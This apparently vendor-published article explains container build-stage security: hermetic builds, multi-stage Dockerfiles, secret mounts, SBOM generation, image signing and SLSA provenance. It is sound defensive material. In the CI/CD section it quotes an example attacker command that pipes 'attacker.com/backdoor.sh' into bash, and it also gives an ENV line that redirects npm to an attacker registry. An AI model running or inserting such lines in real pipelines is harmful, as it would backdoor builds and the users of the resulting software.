Knowledge Hub

Build Stage Security: What Happens Inside the Build and Why It Matters

The build is where source code transforms into a running container image. During this transformation, attackers inject malicious code, modify compilers, cache poison, and tamper with layers. Build security prevents these attacks.

What Happens During the Build

A container build is not a single step. It's a sequence of operations that transform source code into a layered filesystem.

A container build passes through four distinct stages. The first stage, build initialization, fetches the base image by its digest to ensure reproducibility, creates the build context by gathering source files and configurations, and initializes the build cache for layer reuse.

The second stage, source compilation, restores all dependencies from lock files to ensure reproducible builds, invokes the appropriate compiler or interpreter for the language, links all libraries, and generates the final build artifacts such as binaries or bytecode.

The third stage, image assembly, copies the compiled artifacts to the runtime image, creates filesystem layers which Docker will cache, sets image metadata including entrypoint, environment variables, and user, and writes the final image to storage or the registry.

The fourth and final stage, image signing and attestation, generates a Software Bill of Materials documenting every component, scans the image for vulnerabilities, signs the image and its attestations, and records the complete build provenance for auditing.

Each step is an attack surface. An attacker who compromises any step can inject malicious code that persists in the final image.

Build Environment Risks: Isolation and Control

The build environment is the machine or container where compilation happens. It has network access, filesystem access, and permission to execute arbitrary commands.

Compromised build tools present a serious risk. Your build system uses specific versions of compilers, linkers, package managers, and build orchestrators. An attacker who infiltrates the build tool repository or performs a man-in-the-middle attack during download can inject a malicious compiler. The compiler then injects backdoors into every binary it produces. This is known as the Thompson attack—a self-perpetuating compromise that's nearly impossible to detect once established.

Network access during build creates additional risks. If your build system has unrestricted network access, an attacker can intercept downloads of dependencies or build tools. During the RUN npm install phase, if DNS is compromised, npm could resolve to an attacker's registry instead of the real registry. The malicious packages install and run postinstall scripts with root privileges.

Non-reproducible builds are dangerous. If the same source code produces different binaries on different builds, you cannot verify the binary's origin. An attacker can claim a binary came from your source code when it actually came from a compromised build system. Reproducibility proves that a specific binary was produced by a specific source without tampering.

Leaked build secrets create vulnerability. Build systems often have access to secrets including Docker registry credentials, API keys, and package repository credentials. If a build step logs output to stdout, a secret might be exposed. If an image layer contains a secret such as a secret baked into the Dockerfile, anyone with access to the image can extract it.

Build cache poisoning exploits Docker and other container systems' use of layer caching. If a layer's inputs haven't changed, the cached layer is reused, skipping that build step. An attacker with access to the build cache can modify cached layers. On the next build, the poisoned layers are used, even if the source code hasn't changed.

Build environment controls include several best practices. Hermetic builds provide isolation from the network by preventing the build system from fetching external resources. All dependencies must be present before the build starts. SLSA Level 3 and higher require hermetic builds. This is the single most effective control. If the build cannot reach the internet, the attacker cannot inject dependencies via network compromise.

Build tool pinning involves pinning the version of every build tool: the compiler, the package manager, the container runtime, and the linker. Do not use :latest tags. Use specific versions and verify their hashes.

Build isolation means running the build in a dedicated, ephemeral container. After the build finishes, destroy the container. Do not reuse build environments. This prevents an attacker from persisting changes.

Secret management requires you to not bake secrets into images, not log secrets, use temporary credentials that are revoked after the build, and use a secret injection system that provides credentials at build time but does not persist them in the image.

Read-only build cache means if you use a shared build cache, mount it read-only. The build can read cached layers but cannot modify them.

Build logging and audit requires logging every build step, every tool execution, and every network request if allowed. Store logs in immutable storage. Regularly audit logs for suspicious activity.

Build-Time Attacks: Injection and Modification

Even with a controlled environment, attackers can still compromise the build through the source code itself.

Malicious build scripts present risk. Your Dockerfile, Makefile, build.gradle, or setup.py contains arbitrary commands that execute with root privileges during the build. An attacker who modifies these scripts (or commits them directly) can inject arbitrary commands that download and execute malware. These scripts are part of source code, so they're often less scrutinized than application code.

CI/CD pipeline exploitation occurs when your GitHub Actions, GitLab CI, or Jenkins pipeline runs build commands. An attacker who modifies the pipeline configuration (.github/workflows/build.yml, .gitlab-ci.yml, Jenkinsfile) can change what commands execute during the build. For example, instead of running npm install && npm build, the attacker changes it to curl attacker.com/backdoor.sh | bash && npm install && npm build. The backdoor runs before the legitimate build.

Environment variable injection happens because build systems use environment variables to pass configuration. An attacker who modifies Dockerfile environment variables or pipeline variables can inject malicious values. For example, ENV NPM_REGISTRY=http://attacker.com/npm redirects all npm downloads to the attacker's registry.

Layer modification attacks exploit that Docker layers are files on the build system. An attacker with filesystem access to the build cache can modify layers. On the next build, the poisoned layers are used without rebuilding them.

Compiler backdoors occur when the build uses a compromised compiler. Every binary produced is backdoored. This is subtle because the source code is clean, but the compiled output is malicious. Only reproducible builds and binary verification can detect this.

Build-time attack mitigations should include several practices. Build script review means reviewing Dockerfiles, Makefiles, and pipeline configurations as carefully as application code. Look for network requests, shell script execution, and environment variable usage.

Multi-stage builds separate the build stage from the runtime stage. The build stage runs the compiler and produces artifacts. The runtime stage copies only the artifacts and is much smaller. Any build tools or development dependencies left in the build stage are not included in the final image.

Immutable pipeline configurations require storing pipeline configurations (.github/workflows/, .gitlab-ci.yml) in the main branch with branch protection rules. Require code review before changes are accepted.

Build artifact verification means after the build, verify the artifacts. Run checksums, sign artifacts, and generate an SBOM. Verify that artifacts match expected values.

Hermetic build tools use build tools designed for hermeticity: Bazel, Nix, Buck, or similar. These tools enforce isolation and reproducibility by default.

Hermetic Builds: Network Isolation as a Control

A hermetic build cannot access the network. All dependencies must be provided upfront.

Why hermeticity matters: An attacker cannot inject dependencies if the build cannot reach external registries. An attacker cannot intercept downloads if the build makes no downloads. An attacker cannot compromise the build system's network configuration if the build has no network.

How to achieve hermeticity:

Dependency prefetching occurs before the build starts, when all dependencies are downloaded and stored locally, the hash of each dependency is computed, and the hash is included in the build configuration.
Offline build environment means running the build in a network-isolated container. The container has no access to the host's network or external networks.
Build tool configuration involves configuring the package manager and other tools to use only local repositories. npm's --offline flag, go's vendor/ directory, and Maven's -o flag all support this.
Artifact repository means setting up an internal artifact repository (Artifactory, Nexus, or cloud-native alternatives) that contains copies of all dependencies, configured so the build fetches from this internal repository only.

The hermetic build flow has five stages. First, dependency prefetching downloads all dependencies from public registries and verifies their hashes, storing them in an internal artifact repository. Second, the build process starts in a completely isolated environment with no network access. Third, the build pulls dependencies only from the internal repository (not from the internet), compiles the source code, and produces the container image. Fourth, verification confirms the image matches expected hashes. Fifth, the image and its attestations are cryptographically signed.

Several tools enforce hermeticity by default: Bazel, Nix, and YAML-based specification languages prevent ad-hoc network requests and enforce deterministic builds. These approaches declare dependencies upfront and prefetch them, then run isolated from the network. This eliminates many build-time attack vectors because the build cannot make arbitrary network requests or execute shell commands.

Multi-Stage Builds: Separation of Concerns

A multi-stage build uses multiple FROM statements. Each stage can have different tools, libraries, and size.

# Stage 1: Build (large, includes compiler and development tools)FROM golang:1.21-alpine AS builderWORKDIR /srcCOPY go.mod go.sum ./RUN go mod downloadCOPY . .RUN CGO_ENABLED=0 go build -o /bin/app . # Stage 2: Runtime (minimal, includes only the binary)FROM alpine:3.18RUN apk add --no-cache ca-certificatesCOPY --from=builder /bin/app /appENTRYPOINT ["/app"]

In Stage 1 (builder), you have the full Go toolchain, all dependencies, and source code. The compiler, linker, and package manager all run here. Build artifacts are produced. In Stage 2 (runtime), only the compiled binary and runtime essentials are present. The compiler, package manager, and source code are not included.

Benefits of multi-stage builds include smaller final image (the runtime image has no compiler or development tools, so it's much smaller—a 1 GB build stage might produce a 50 MB runtime image), reduced attack surface (the runtime image has fewer packages and tools, so fewer vulnerabilities), clear separation (build dependencies and runtime dependencies are explicitly separated, making it easier to audit what's in the runtime image), and layer optimization (Docker caches layers, the build stage's layers are cached separately from the runtime stage, and a change to the source code doesn't invalidate the base image layer).

The Builder Pattern: Variant Strategies

Some projects maintain two Dockerfiles: Dockerfile.dev for the build environment and Dockerfile.prod for the runtime environment. This makes the separation explicit and prevents accidentally shipping development tools.

CleanStart takes a step further by using a unified YAML specification that automatically generates optimal build configurations. The specification declares build-stage requirements (language, compiler version, dependencies), runtime-stage requirements (minimal runtime, UID, capabilities), source locations (git repositories with commit signatures), and artifact locations (what gets copied to the runtime stage). The CleanStart build system reads this specification, constructs a hermetic build environment, compiles the source, generates the runtime image, and produces attestations. This approach eliminates Dockerfile complexity and reduces the chance of misconfiguration.

Dockerfile Security Pitfalls

If you use Dockerfiles instead of a more structured approach, watch for these common mistakes.

Running as root occurs when by default, RUN commands execute as root. If the build is compromised, commands execute with full privileges. Use USER to switch to a non-root user for build steps that don't require root.

FROM ubuntu:22.04RUN apt-get update && apt-get install -y build-essentialUSER builder:builderCOPY . /srcRUN cd /src && make build

Secrets in layers happens because every RUN command creates a layer and every layer is part of the image. If you RUN curl https://example.com/secret-api-key.pem, that URL (and potentially the secret) is visible in the image history and layer metadata.

Use --secret (buildkit feature) to pass secrets to the build without baking them into layers:

RUN --mount=type=secret,id=npm_token \    npm config set //registry.npmjs.org/:_authToken=$(cat /run/secrets/npm_token) && \    npm install

Unverified COPY means when you COPY . /app, you're copying source files from the build context. If an attacker can modify the build context (the working directory where you run docker build), they can inject files. Always verify the build context's contents before building.

Running package managers without verification occurs when RUN apt-get update && apt-get install -y curl fetches packages from remote repositories without verifying hashes. If the package manager repository is compromised, poisoned packages install. Use hermetic builds to avoid this.

Using :latest tags means FROM ubuntu:latest means Ubuntu can change what that tag points to. Your image is non-reproducible. Use specific versions and digests: FROM ubuntu:22.04@sha256:a1b2c3d4e5f6....

Build Scanning and Attestation

After the build produces an image, scanning and attestation capture what the image contains and who built it.

Software Bill of Materials (SBOM) lists every package, library, and component in the image. Tools like Syft generate SBOMs in standard formats (SPDX, CycloneDX). The SBOM documents exactly what's in the image and enables dependency scanning at scale.

Image scanning for vulnerabilities occurs when after the build, vulnerability scanning tools (Trivy, Clair, Grype) run on the image to identify known CVEs in installed packages. If critical vulnerabilities are found, the build fails and alerts the team.

Image signing means signing the image and its attestations using a signing key. Use Cosign (part of Sigstore) to sign container images with OIDC tokens or asymmetric keys. Signed images can be verified at runtime to ensure they haven't been tampered with.

Build provenance generates a build attestation in SLSA Provenance format that records the build environment (OS, tool versions), the source code (git repo, commit hash), the build configuration (compiler flags, dependencies), and the output artifacts (image digest, checksums). This provenance proves that a specific image was built from a specific source by a specific build system.

Attestation format (SLSA Provenance v1):

{  "buildType": "https://github.com/cleanstart/build/v1",  "builder": {    "id": "https://github.com/cleanstart/builder/v1"  },  "sourceUri": "git+https://github.com/myorg/myapp@v1.2.3",  "invocation": {    "configSource": {      "uri": "git+https://github.com/myorg/myapp@refs/heads/main",      "digest": {        "sha256": "abc123def456..."      }    }  },  "buildConfig": {    "version": "3.4.0",    "os": "linux",    "arch": "amd64"  },  "materials": [    {      "uri": "pkg:npm/lodash@4.17.21",      "digest": {        "sha256": "def456abc123..."      }    }  ],  "byproducts": {    "sbom": {      "location": "oci://registry.example.com/myapp:v1.2.3.sbom",      "mediaType": "application/spdx+json"    }  }}

Attestation storage means attestations can be attached to images in the registry (using OCI artifact types) or stored separately. Cosign can attach attestations to images using annotations.

cosign sign --key cosign.key ghcr.io/myorg/myapp:v1.2.3cosign attach attestation --attestation attestation.json \  ghcr.io/myorg/myapp:v1.2.3cosign verify --key cosign.pub ghcr.io/myorg/myapp:v1.2.3

From Build to Runtime

The build stage produces a container image. But the image's security properties only persist if the runtime stage enforces them.

Build Security Checklist

[ ] Base image is pinned by digest, not by tag. [ ] Build runs in an isolated, ephemeral environment (hermetic build). [ ] Build has no network access (all dependencies prefetched). [ ] All build tools are pinned to specific versions. [ ] Multi-stage builds are used to separate build and runtime. [ ] No secrets are baked into image layers. [ ] No build tools or development dependencies are included in the final image. [ ] Artifacts are generated in the build stage and copied (not left as layers). [ ] Non-root user is used for build steps where possible. [ ] Image is scanned for vulnerabilities after the build. [ ] SBOM is generated and attached to the image. [ ] Image and attestations are signed. [ ] Build provenance is recorded in SLSA format. [ ] CI/CD pipeline configuration is reviewed and protected with branch rules. [ ] Build logs are stored immutably and audited regularly.

Next Steps: Build Securely Across Your Supply Chain

Understanding the build — Learn what secure builds look like: Pre-Build Stage Security — Control what source and dependencies enter the build. Container Image Fundamentals — Understand what you're building. The 11 Build Artifacts — What a secure build generates (SBOMs, signatures, provenance). Implementing secure builds — Practical guidance for your CI/CD: The Continuous Trust Loop — Automated rebuilds when vulnerabilities are detected. Verified Source Philosophy — Design principles for building from known sources. Dockerfile to YAML Migration — Modernize your build specifications. Deployment and operations — Maintain security after the build: End-to-End Secure Deployment — Deploy with scanning and verification. Helm Charts & Kubernetes — Operate images securely at scale. Supply Chain Disaster Recovery — Protect your supply chain integrity.

Summary

Build security protects the transformation from source code to container image. It operates on three fronts: the build environment (isolation and control), the build process (compilation and assembly), and build outputs (scanning, signing, and attestation).

Without build-stage controls, attackers inject malicious code during compilation. With them—hermetic builds, multi-stage Dockerfiles, dependency verification, image scanning, and provenance attestation—you ensure that the image you deploy matches the source code you reviewed.

The pre-build stage controls what code enters the build (see Pre-Build Stage Security). The build stage ensures that code is compiled safely and attestations are generated. The runtime stage then executes the image safely and detects attacks (see Runtime Stage Security).

Build Tooling: Alternative Approaches

Multiple tools and approaches exist for securing the build stage.

Docker + best practices uses standard Dockerfile with explicit adherence to security practices (pinning base images by digest, multi-stage builds, no secrets, immutable attestations). Advantages include ubiquity and being widely understood. Disadvantages are that it requires discipline and is easy to misconfigure.

Buildah is an OCI-native builder that supports rootless builds and explicit layer control. Advantages include fine-grained control and requiring no Docker daemon. Disadvantages are a steeper learning curve and less documentation.

Bazel is a hermetic build system enforcing reproducibility and isolation by design. Advantages include enforcing best practices automatically and being excellent for polyglot projects. Disadvantages include a significant learning curve, slower performance for simple projects, and requiring a rethinking of builds.

Nix is purely functional package management and build system. Advantages include guaranteed reproducibility and excellent supply chain controls. Disadvantages include a steep learning curve and a very different paradigm from traditional builds.

Declarative YAML-based builders use build specifications that declare dependencies and outputs rather than prescribing build steps. Advantages include less opportunity for misconfiguration and being easier to verify for hermeticity. Disadvantages are that they're less flexible for complex builds and have a newer ecosystem with fewer examples.

Cloud-native build services (Cloud Build, GitHub Actions, GitLab CI) are managed build environments with built-in isolation and logging. Advantages include having no infrastructure to manage and built-in compliance logging. Disadvantages include vendor lock-in and less control over the build environment.

The common principle across all approaches: control the build environment, eliminate ad-hoc network access, verify artifacts, and generate provenance attestations.